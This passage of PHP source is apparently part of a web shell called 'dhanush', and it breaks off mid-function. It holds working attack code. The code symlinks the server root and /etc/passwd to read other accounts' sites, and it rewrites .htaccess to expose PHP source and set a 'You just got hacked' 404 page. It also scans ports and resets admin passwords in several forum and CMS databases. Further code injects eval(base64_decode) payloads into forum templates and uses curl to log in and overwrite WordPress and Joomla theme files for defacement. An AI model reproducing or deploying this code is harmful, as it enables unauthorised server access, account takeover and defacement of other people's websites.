2639 $fp3 = fopen('dhanushsym.pl','w');
2640 $fw3 = fwrite($fp3,$dhanushsym);
2641 @fclose($fp3);
2642 chmod("dhanushsym.pl", 0755);
2643 ?><center><iframe src="dhanush/dhanushsym.pl" height="400" width="600"></iframe></center><?php
2644}
2645else if(isset($_GET["symlinkfile"]))
2646{
2647 if(!isset($_GET['file']))
2648 {
2649 ?>
2650 <center>
2651 <form onSubmit="getdata('symlinkmyfile',file.value);return false;">
2652 <input type="text" class="box" name="file" size="50" value="/etc/passwd">
2653 <input type="button" value="Create Symlink" onClick="getdata('symlinkmyfile',file.value)" class="but">
2654 </form></center>
2655 <br><br>
2656 <?php
2657 }
2658}
2659else if(isset($_GET['symlinkmyfile']))
2660{
2661 if($os == "Linux")
2662 {
2663 $fakedir="cx";
2664 $fakedep=16;
2665
2666 $num=0; // offset of symlink.$num
2667
2668 if(!empty($_GET['myfile']))
2669 $file=$_GET['myfile'];
2670 else $file="";
2671
2672 if(empty($file))
2673 exit;
2674
2675 if(!is_writable("."))
2676 echo "not writable directory";
2677
2678 $level=0;
2679
2680 for($as=0;$as<$fakedep;$as++)
2681 {
2682 if(!file_exists($fakedir))
2683 mkdir($fakedir);
2684 chdir($fakedir);
2685 }
2686
2687 while(1<$as--) chdir("..");
2688
2689 $hardstyle = explode("/", $file);
2690
2691 for($a=0;$a<count($hardstyle);$a++)
2692 {
2693 if(!empty($hardstyle[$a]))
2694 {
2695 if(!file_exists($hardstyle[$a]))
2696 mkdir($hardstyle[$a]);
2697 chdir($hardstyle[$a]);
2698 $as++;
2699 }
2700 }
2701 $as++;
2702 while($as--)
2703 chdir("..");
2704
2705 @rmdir("fakesymlink");
2706 @unlink("fakesymlink");
2707
2708 @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
2709
2710 while(1)
2711 if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
2712 else $num++;
2713
2714 @unlink("fakesymlink");
2715 mkdir("fakesymlink");
2716
2717 echo '<CENTER>check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</CENTER>';
2718 }
2719 else
2720 echo '<CENTER>Cannot Create Symlink</CENTER>';
2721}
2722else if(isset($_POST['cpaneluser']))
2723{
2724 if(is_numeric($_POST['noofsubdomain']))
2725 {
2726 for($i=1;$i<=$_POST['noofsubdomain'];$i++)
2727 {
2728 $subDomain = randomt();
2729 echo make_subdomain($subDomain,$_POST['cpaneluser'],$_POST['cpanelpass'],$_POST['subindex']);
2730 }
2731 }
2732 else
2733 echo "Insert number";
2734}
2735else if(isset($_REQUEST['404new']))
2736{
2737 ?>
2738 <form>
2739 <center><textarea name=message cols=100 rows=18 class=box>lol! You just got hacked</textarea></br>
2740 <input type="button" onClick="my404page(message.value)" value=" Save " class=but></center>
2741 </br>
2742 </form>
2743 <?php
2744}
2745else if(isset($_REQUEST['404page']))
2746{
2747 $url = $_SERVER['REQUEST_URI'];
2748 $path=explode('/',$url);
2749 $url =str_replace($path[count($path)-1],'',$url);
2750 if(isset($_POST['message']))
2751 {
2752 if($myfile = fopen(".htaccess", "a"))
2753 {
2754 fwrite($myfile, "ErrorDocument 404 ".$url."404.html \n\r");
2755 if($myfilee = fopen("404.html", "w+"))
2756 {
2757 fwrite($myfilee, $_POST['message']);
2758 }
2759 echo "<center><font class=txt>Done setting 404 Page !!!!</font></center>";
2760 }
2761 else
2762 echo "<center>Cannot Set 404 Page</center>";
2763 }
2764 else if(strlen($ind) != 0)
2765 {
2766 if($myfile = fopen(".htaccess", "a"))
2767 {
2768 fwrite($myfile, "ErrorDocument 404 ".$url."404.html \n\r");
2769
2770 if($myfilee = fopen("404.html", "w+"))
2771 {
2772 fwrite($myfilee, base64_decode($ind));
2773
2774 fclose($myfilee);
2775 echo "<center><font class=txt>Done setting 404 Page !!!!</font></center>";
2776 }
2777 fclose($myfile);
2778 }
2779 else
2780 {
2781 echo "<center>Cannot Set 404 Page</center>";
2782 }
2783 }
2784 else
2785 echo "<center>Nothing Specified in the shell</center>";
2786}
2787else if(isset($_GET["symlink"]))
2788{
2789 $d0mains = @file("/etc/named.conf");
2790 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
2791 $path=explode('/',$url);
2792 $url =str_replace($path[count($path)-1],'',$url);
2793 if($d0mains)
2794 {
2795 @mkdir("dhanush",0777);
2796 @chdir("dhanush");
2797 execmd("ln -s / root");
2798
2799 $file3 = 'Options all
2800 DirectoryIndex Sux.html
2801 AddType text/plain .php
2802 AddHandler server-parsed .php
2803 AddType text/plain .html
2804 AddHandler txt .html
2805 Require None
2806 Satisfy Any
2807 ';
2808 $fp3 = fopen('.htaccess','w');
2809 $fw3 = fwrite($fp3,$file3);
2810 @fclose($fp3);
2811
2812 echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr align =center><td align=center><font size=3 >S. No.</font></td><td align=center><font size=3 >Domains</font></td><td align=center><font size=3 >Users</font></td><td align=center><font size=3 >Symlink</font></td><td align=center><font size=3 >Information</font></td></tr>";
2813
2814 $dcount = 1;
2815 foreach($d0mains as $d0main)
2816 {
2817 if(eregi("zone",$d0main))
2818 {
2819 preg_match_all('#zone "(.*)"#', $d0main, $domains);
2820 flush();
2821
2822 if(strlen(trim($domains[1][0])) > 2)
2823 {
2824 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
2825
2826 echo "<tr align=center><td><font class=txt>" . $dcount . "</font></td><td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td><td><font class=txt>".$user['name']."</font></td><td><a href=".$url."dhanush/root/home/".$user['name']."/public_html target='_blank'><font class=txt>Symlink</font></a></td><td><font class=txt><a href=?info=".$domains[1][0]." target=_blank>info</a></font></td></tr>"; flush();
2827 $dcount++;
2828 }
2829 }
2830
2831 }
2832 echo "</table>";
2833 }
2834 else
2835 {
2836 if($os == "Linux")
2837 {
2838 ?>
2839 <div style="float:left;position:fixed;">
2840 <form>
2841 <table cellpadding="9">
2842 <tr>
2843 <th colspan="2">Get User Name</th>
2844 </tr>
2845 <tr>
2846 <td>Enter Website Name :</td>
2847 <td><input type="text" name="sitename" value="sitename.com" class="sbox"></td>
2848 </tr>
2849 <tr>
2850 <td align="center" colspan="2"><input type="button" onClick="getname(sitename.value)" value=" Get IT " class="but"></td>
2851 </tr>
2852 <tr>
2853 <td colspan=2 align=center><div style="width:250px;" id="showsite"></div></td>
2854 </tr>
2855 </table>
2856 </form>
2857 </div>
2858 <?php
2859 $TEST=@file('/etc/passwd');
2860 if ($TEST)
2861 {
2862 @mkdir("dhanush",0777);
2863 @chdir("dhanush");
2864 execmd("ln -s /root");
2865
2866$file3 = 'Options all
2867 DirectoryIndex Sux.html
2868 AddType text/plain .php
2869 AddHandler server-parsed .php
2870 AddType text/plain .html
2871 AddHandler txt .html
2872 Require None
2873 Satisfy Any
2874 ';
2875 $fp3 = fopen('.htaccess','w');
2876 $fw3 = fwrite($fp3,$file3);
2877 @fclose($fp3);
2878
2879 echo "<table align=center border=1 style='width:40%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Users</font></td><td align=center><font size=3 >Symlink</font></td></tr>";
2880
2881
2882 $dcount = 1;
2883 $file = fopen("/etc/passwd", "r");
2884 //Output a line of the file until the end is reached
2885 while(!feof($file))
2886 {
2887 $s = fgets($file);
2888 $matches = array();
2889 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2890 $matches = str_replace("home/","",$matches[1]);
2891 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2892 continue;
2893 echo "<tr><td align=center><font size=3 class=txt>" . $dcount . "</td><td align=center><font size=3 class=txt>" . $matches . "</td>";
2894 echo "<td align=center><font size=3 class=txt><a href=".$url."dhanush/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2895 $dcount++;
2896 }
2897 fclose($file);
2898
2899 echo "</table>";
2900 }
2901 else
2902 {
2903 @mkdir("dhanush",0777);
2904 @chdir("dhanush");
2905 execmd("ln -s / root");
2906 $file3 = 'Options all
2907 DirectoryIndex Sux.html
2908 AddType text/plain .php
2909 AddHandler server-parsed .php
2910 AddType text/plain .html
2911 AddHandler txt .html
2912 Require None
2913 Satisfy Any
2914 ';
2915 $fp3 = fopen('.htaccess','w');
2916 $fw3 = fwrite($fp3,$file3);
2917 @fclose($fp3);
2918
2919 echo "<table align=center border=1 style='width:40%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Users</font></td><td align=center><font size=3 >Symlink</font></td></tr>";
2920
2921 $temp = "";
2922 $val1 = 0;
2923 $val2 = 1000;
2924 for(;$val1 <= $val2;$val1++)
2925 {
2926 $uid = @posix_getpwuid($val1);
2927 if ($uid)
2928 $temp .= join(':',$uid)."\n";
2929 }
2930 echo '<br/>';
2931 $temp = trim($temp);
2932
2933 $file5 = fopen("test.txt","w");
2934 fputs($file5,$temp);
2935 fclose($file5);
2936
2937 $dcount = 1;
2938 $file = fopen("test.txt", "r");
2939 while(!feof($file))
2940 {
2941 $s = fgets($file);
2942 $matches = array();
2943 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2944 $matches = str_replace("home/","",$matches[1]);
2945 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2946 continue;
2947 echo "<tr><td align=center><font size=3 class=txt>" . $dcount . "</td><td align=center><font size=3 class=txt>" . $matches . "</td>";
2948 echo "<td align=center><font size=3 class=txt><a href=".$url."dhanush/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2949 $dcount++;
2950 }
2951 fclose($file);
2952 echo "</table>";
2953 unlink("test.txt");
2954 }
2955 }
2956 else
2957 echo "<center><font size=4 >Cannot create Symlink</font></center>";
2958 }
2959}
2960else if(isset($_GET['host']) && isset($_GET['protocol']))
2961{
2962 echo "Open Ports: ";
2963 $host = $_GET['host'];
2964 $proto = $_GET['protocol'];
2965 $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
2966 for($current = 0; $current <= 23; $current++)
2967 {
2968 $currents = $myports[$current];
2969 $service = getservbyport($currents, $proto);
2970 // Try to connect to port
2971 $result = fsockopen($host, $currents, $errno, $errstr, 1);
2972 // Show results
2973 if($result)
2974 echo "<font class=txt>$currents, </font>";
2975 }
2976}
2977else if(isset($_REQUEST['forumpass']))
2978{
2979 $localhost = $_GET['f1'];
2980 $database = $_GET['f2'];
2981 $username = $_GET['f3'];
2982 $password = $_GET['f4'];
2983 $prefix = $_GET['prefix'];
2984 $newpass = $_GET['newpass'];
2985 $uid = $_GET['uid'];
2986
2987 if($_GET['forums'] == "vb")
2988 {
2989 $newpass = $_GET['newipbpass'];
2990 $uid = $_GET['ipbuid'];
2991 $con = mysql_connect($localhost,$username,$password);
2992 $db = mysql_select_db($database,$con);
2993 $salt = "eghjghrtd";
2994 $newpassword = md5(md5($newpass) . $salt);
2995 if($prefix == "" || $prefix == null)
2996 $sql = mysql_query("update user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
2997 else
2998 $sql = mysql_query("update ".$prefix."user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
2999 if($sql)
3000 {
3001 mysql_close($con);
3002 echo "<font class=txt>Password Changed Successfully</font>";
3003 }
3004 else
3005 echo "Cannot Change Password";
3006 }
3007 else if($_GET['forums'] == "mybb")
3008 {
3009 $newpass = $_GET['newipbpass'];
3010 $uid = $_GET['ipbuid'];
3011 $con = mysql_connect($localhost,$username,$password);
3012 $db = mysql_select_db($database,$con);
3013 $salt = "jeghj";
3014 $newpassword = md5(md5($salt).md5($newpass));
3015 if($prefix == "" || $prefix == null)
3016 $sql = mysql_query("update mybb_users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
3017 else
3018 $sql = mysql_query("update ".$prefix."users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
3019 if($sql)
3020 {
3021 mysql_close($con);
3022 echo "<font class=txt>Password Changed Successfully</font>";
3023 }
3024 else
3025 echo "Cannot Change Password";
3026 }
3027 else if($_GET['forums'] == "smf")
3028 {
3029 $newpass = $_GET['newipbpass'];
3030 $uid = $_GET['ipbuid'];
3031 $con = mysql_connect($localhost,$username,$password);
3032 $db = mysql_select_db($database,$con);
3033
3034 if($prefix == "" || $prefix == null)
3035 {
3036 $result = mysql_query("select member_name from smf_members where id_member = $uid");
3037 $row = mysql_fetch_array($result);
3038 $membername = $row['member_name'];
3039 $newpassword = sha1(strtolower($membername).$newpass);
3040 $sql = mysql_query("update smf_members set passwd = '$newpassword' where id_member = '$uid'");
3041 }
3042 else
3043
3044 {
3045 $result = mysql_query("select member_name from ".$prefix."members where id_member = $uid");
3046 $row = mysql_fetch_array($result);
3047 $membername = $row['member_name'];
3048 $newpassword = sha1(strtolower($membername).$newpass);
3049 $sql = mysql_query("update ".$prefix."members set passwd = '$newpassword' where id_member = '$uid'");
3050 }
3051 if($sql)
3052 {
3053 mysql_close($con);
3054 echo "<font class=txt>Password Changed Successfully</font>";
3055 }
3056 else
3057 echo "Cannot Change Password";
3058 }
3059 else if($_GET['forums'] == "phpbb")
3060 {
3061 $newpass = $_POST['newipbpass'];
3062 $uid = $_POST['ipbuid'];
3063 $con = mysql_connect($localhost,$username,$password);
3064 $db = mysql_select_db($database,$con);
3065
3066 $newpassword = md5($newpass);
3067 if(empty($prefix) || $prefix == null)
3068 $sql = mysql_query("update phpb_users set user_password = '$newpassword' where user_id = '$uid'");
3069 else
3070 $sql = mysql_query("update ".$prefix."users set user_password = '$newpassword' where user_id = '$uid'");
3071 if($sql)
3072 {
3073 mysql_close($con);
3074 echo "<font class=txt>Password Changed Successfully</font>";
3075 }
3076 else
3077 echo "Cannot Change Password";
3078 }
3079 else if($_GET['forums'] == "ipb")
3080 {
3081 $newpass = $_POST['newipbpass'];
3082 $uid = $_POST['ipbuid'];
3083 $con = mysql_connect($localhost,$username,$password);
3084 $db = mysql_select_db($database,$con);
3085 $salt = "eghj";
3086 $newpassword = md5(md5($salt).md5($newpass));
3087 if($prefix == "" || $prefix == null)
3088 $sql = mysql_query("update members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
3089 else
3090 $sql = mysql_query("update ".$prefix."members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
3091 if($sql)
3092 {
3093 mysql_close($con);
3094 echo "<font class=txt>Password Changed Successfully</font>";
3095 }
3096 else
3097 echo "Cannot Change Password";
3098 }
3099 else if($_GET['forums'] == "wp")
3100 {
3101 $uname = $_GET['uname'];
3102 $con = mysql_connect($localhost,$username,$password);
3103 $db = mysql_select_db($database,$con);
3104
3105 $newpassword = md5($newpass);
3106 $sql = mysql_query("update ".$prefix."users set user_pass = '$newpassword', user_login = '$uname'");
3107 if($sql)
3108 {
3109 mysql_close($con);
3110 echo "<font class=txt>Password Changed Successfully</font>";
3111 }
3112 else
3113 echo "Cannot Change Password";
3114 }
3115 else if($_GET['forums'] == "joomla")
3116 {
3117 $newjoomlapass = $_GET['newjoomlapass'];
3118 $joomlauname = $_GET['username'];
3119 $con = mysql_connect($localhost,$username,$password);
3120 $db = mysql_select_db($database,$con);
3121
3122 $newpassword = md5($newjoomlapass);
3123 $sql = mysql_query("update ".$prefix."users set password = '$newpassword', username = '$joomlauname'");
3124 if($sql)
3125 {
3126 mysql_close($con);
3127 echo "<font class=txt>Password Changed Successfully</font>";
3128 }
3129 else
3130 echo "Cannot Change Password";
3131 }
3132}
3133else if(isset($_POST['forumdeface']))
3134{
3135 $localhost = $_POST['f1'];
3136 $database = $_POST['f2'];
3137 $username = $_POST['f3'];
3138 $password = $_POST['f4'];
3139 $index = $_POST['index'];
3140 $prefix = $_POST['tableprefix'];
3141
3142 if($_POST['forumdeface'] == "vb")
3143 {
3144 $con =@ mysql_connect($localhost,$username,$password);
3145 $db =@ mysql_select_db($database,$con);
3146 $index=str_replace('"','\\"',$index);
3147 $attack = "{\${eval(base64_decode(\'";
3148 $attack .= base64_encode("echo \"$index\";");
3149 $attack .= "\'))}}{\${exit()}}</textarea>";
3150 if($prefix == "" || $prefix == null)
3151 $query = "UPDATE template SET template = '$attack'";
3152 else
3153 $query = "UPDATE ".$prefix."template SET template = '$attack'";
3154 $result =@ mysql_query($query,$con);
3155 if($result)
3156 echo "<center><font class=txt size=4><blink>Vbulletin Forum Defaced Successfully</blink></font></center>";
3157 else
3158 echo "<center><font size=4><blink>Cannot Deface Vbulletin Forum</blink></font></center>";
3159 }
3160 else if($_POST['forumdeface'] == "mybb")
3161 {
3162 $con =@ mysql_connect($localhost,$username,$password);
3163 $db =@ mysql_select_db($database,$con);
3164 $attack = "{\${eval(base64_decode(\'";
3165 $attack .= base64_encode("echo \"$index\";");
3166 $attack .= "\'))}}{\${exit()}}</textarea>";
3167 $attack = str_replace('"',"\\'",$attack);
3168
3169 if($prefix == "" || $prefix == null)
3170 $query = "UPDATE mybb_templates SET template = '$attack'";
3171 else
3172 $query = "UPDATE ".$prefix."templates SET template = '$attack'";
3173 $result =@ mysql_query($query,$con);
3174 if($result)
3175 echo "<center><font class=txt size=4><blink>Mybb Forum Defaced Successfully</blink></font></center>";
3176 else
3177 echo "<center><font size=4><blink>Cannot Deface Mybb Forum</blink></font></center>";
3178 }
3179 else if($_POST['forumdeface'] == "smf")
3180 {
3181 $head = $_POST['head'];
3182 $catid = $_POST['f5'];
3183
3184 $con =@ mysql_connect($localhost,$username,$password);
3185 $db =@ mysql_select_db($database,$con);
3186 if($prefix == "" || $prefix == null)
3187 $query = "UPDATE boards SET name='$head', description='$index' WHERE id_cat='$catid'";
3188 else
3189 $query = "UPDATE ".$prefix."boards SET name='$head', description='$index' WHERE id_cat='$catid'";
3190 $result =@ mysql_query($query,$con);
3191 if($result)
3192 echo "<center><font class=txt size=4><blink>SMF Forum Index Changed Successfully</blink></font></center>";
3193 else
3194 echo "<center><font size=4><blink>Cannot Deface SMF Forum</blink></font></center>";
3195 }
3196 else if($_POST['forumdeface'] == "ipb")
3197 {
3198 $head = $_POST['head'];
3199 $catid = $_POST['f5'];
3200
3201 $IPB = "forums";
3202 $con =@ mysql_connect($localhost,$username,$password);
3203 $db =@ mysql_select_db($database,$con);
3204 if($prefix == "" || $prefix == null)
3205 $result =@mysql_query($query = "UPDATE $IPB SET name = '$head', description = '$index' where id = '$catid'");
3206 else
3207 $result =@mysql_query($query = "UPDATE $prefix.$IPB SET name = '$head', description = '$index' where id = '$catid'");
3208 if($result)
3209 echo "<center><font class=txt size=4><blink>Forum Defaced Successfully</blink></font></center>";
3210 else
3211
3212 echo "<center><font size=4><blink>Cannot Deface Forum</blink></font></center>";
3213 }
3214 else if($_POST['forumdeface'] == "wp")
3215 {
3216 $site_url = $_POST['siteurl'];
3217 $index = urlencode($index);
3218 $con =@ mysql_connect($localhost,$username,$password);
3219 $db =@ mysql_select_db($database,$con);
3220 $req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '$1$42REgxSR$.tLV4PSbQmCKsisyCSyhq.'");
3221 echo("<br>[+] Changing admin password to 123456789<br>");
3222
3223 if($req1)
3224 {
3225 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
3226 $data = mysql_fetch_array($req);
3227 if(empty($site_url))
3228 $site_url=$data["option_value"];
3229 $output .= "Site : ".$site_url."<br>";
3230
3231 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");
3232 $data = mysql_fetch_array($req);
3233 $template = $data["option_value"];
3234
3235 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");
3236 $data = mysql_fetch_array($req);
3237 $current_theme = $data["option_value"];
3238
3239 $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
3240 $url2=$site_url."/wp-login.php";
3241
3242 $ch = curl_init();
3243 curl_setopt($ch, CURLOPT_URL, $url2);
3244 curl_setopt($ch, CURLOPT_POST, 1);
3245 curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123456789&rememberme=forever&wp-submit=Log In&testcookie=1");
3246 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3247 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
3248 curl_setopt($ch, CURLOPT_HEADER, 0);
3249 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
3250 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3251 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
3252 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
3253 $buffer = curl_exec($ch);
3254
3255 $pos = strpos($buffer,"action=logout");
3256 if($pos === false) {
3257 $output.= "[-] Successful Login<br />";
3258 } else {
3259 $output.= "[+] Successful Login<br />";
3260 }
3261
3262 $url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.urlencode($template);
3263 curl_setopt($ch, CURLOPT_URL, $url2);
3264 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
3265 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
3266 curl_setopt($ch, CURLOPT_HEADER, 0);
3267 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3268 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
3269 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
3270 $buffer0 = curl_exec($ch);
3271
3272 $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
3273 $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
3274
3275 if(substr_count($_file,"index.php") != 0)
3276 {
3277 $url2=$site_url."/wp-admin/theme-editor.php";
3278 curl_setopt($ch, CURLOPT_URL, $url2);
3279 curl_setopt($ch, CURLOPT_POST, 1);
3280 curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".$index."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
3281 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3282 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3283 curl_setopt($ch, CURLOPT_HEADER, 0);
3284 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3285 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
3286 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
3287 $buffer = curl_exec($ch);
3288 curl_close($ch);
3289
3290 $pos = strpos($buffer,'<div id="message" class="updated">');
3291 $cond = 0;
3292 if($pos === false) {
3293 $output.= "<center><font size=4><blink>Cannot Deface Wordpress</blink></font></center>";
3294 } else {
3295 $output.= "<center><font class=txt size=4><blink>Wordpress Defaced Successfully</blink></font></center>";
3296 $cond = 1;
3297 }
3298 }
3299 else
3300 {
3301 $url2=$site_url.'/wp-admin/theme-editor.php?file=/themes/'.$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';
3302 curl_setopt($ch, CURLOPT_URL, $url2);
3303 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
3304 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
3305 curl_setopt($ch, CURLOPT_HEADER, 0);
3306 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3307 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
3308 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
3309 $buffer0 = curl_exec($ch);
3310
3311 $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
3312 $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
3313
3314
3315 $url2=$site_url."/wp-admin/theme-editor.php";
3316 curl_setopt($ch, CURLOPT_URL, $url2);
3317 curl_setopt($ch, CURLOPT_POST, 1);
3318 curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".$index."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
3319 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3320 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3321 curl_setopt($ch, CURLOPT_HEADER, 0);
3322 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3323 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
3324 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
3325 $buffer = curl_exec($ch);
3326 curl_close($ch);
3327
3328 $pos = strpos($buffer,'<div id="message" class="updated">');
3329 $cond = 0;
3330 if($pos === false) {
3331 $output.= "<center><font size=4><blink>Cannot Deface Wordpress</blink></font></center>";
3332 } else {
3333 $output.= "<center><font class=txt size=4><blink>Wordpress Defaced Successfully</blink></font></center>";
3334 $cond = 1;
3335 }
3336 }
3337 } else {
3338 $output.= "[-] DB Error<br />";
3339 }
3340 echo $output;
3341 global $base_path;
3342 unlink($base_path.'COOKIE.txt');
3343 }
3344 else if($_POST['forumdeface'] == "joomla")
3345 {
3346 $site_url = $_POST['siteurl'];
3347 $dbprefix = $_POST['tableprefix'];
3348 $dbname = $_POST['f2'];
3349 $h="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['index']))))."'))); exit; ?>";
3350
3351 $co=randomt();
3352
3353 $link=mysql_connect($localhost,$username,$password) ;
3354 mysql_select_db($dbname,$link);
3355
3356 $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'");
3357
3358 $req =mysql_query("SELECT * from `".$dbprefix."extensions` ");
3359
3360 if ( $req )
3361 {
3362 $req =mysql_query("SELECT * from `".$dbprefix."template_styles` WHERE client_id='0' and home='1'");
3363 $data = mysql_fetch_array($req);
3364 $template_name=$data["template"];
3365
3366 $req =mysql_query("SELECT * from `".$dbprefix."extensions` WHERE name='".$template_name."'");
3367 $data = mysql_fetch_array($req);
3368 $template_id=$data["extension_id"];
3369
3370 $url2=$site_url."/index.php";
3371
3372 $ch = curl_init();
3373 curl_setopt($ch, CURLOPT_URL, $url2);
3374 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3375 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3376 curl_setopt($ch, CURLOPT_HEADER, 1);
3377 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3378 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3379 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3380
3381
3382 $buffer = curl_exec($ch);
3383
3384 $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
3385 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
3386
3387
3388 $url2=$site_url."/index.php";
3389 $ch = curl_init();
3390 curl_setopt($ch, CURLOPT_URL, $url2);
3391 curl_setopt($ch, CURLOPT_POST, 1);
3392 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$return."&".$hidden."=1");
3393 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3394 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3395 curl_setopt($ch, CURLOPT_HEADER, 0);
3396 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3397 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3398 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3399 $buffer = curl_exec($ch);
3400
3401 $pos = strpos($buffer,"com_config");
3402 if($pos === false)
3403 {
3404 echo("<br>[-] Login Error");
3405 exit;
3406 }
3407
3408 $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
3409 $ch = curl_init();
3410 curl_setopt($ch, CURLOPT_URL, $url2);
3411 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3412 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3413 curl_setopt($ch, CURLOPT_HEADER, 0);
3414 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3415 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3416
3417 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3418 $buffer = curl_exec($ch);
3419
3420 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
3421 if(!$hidden2)
3422 {
3423 echo("<br>[-] index.php Not found in Theme Editor");
3424 exit;
3425 }
3426
3427 $url2=$site_url."/index.php?option=com_templates&layout=edit";
3428
3429 $ch = curl_init();
3430 curl_setopt($ch, CURLOPT_URL, $url2);
3431 curl_setopt($ch, CURLOPT_POST, 1);
3432 curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
3433
3434 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3435 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
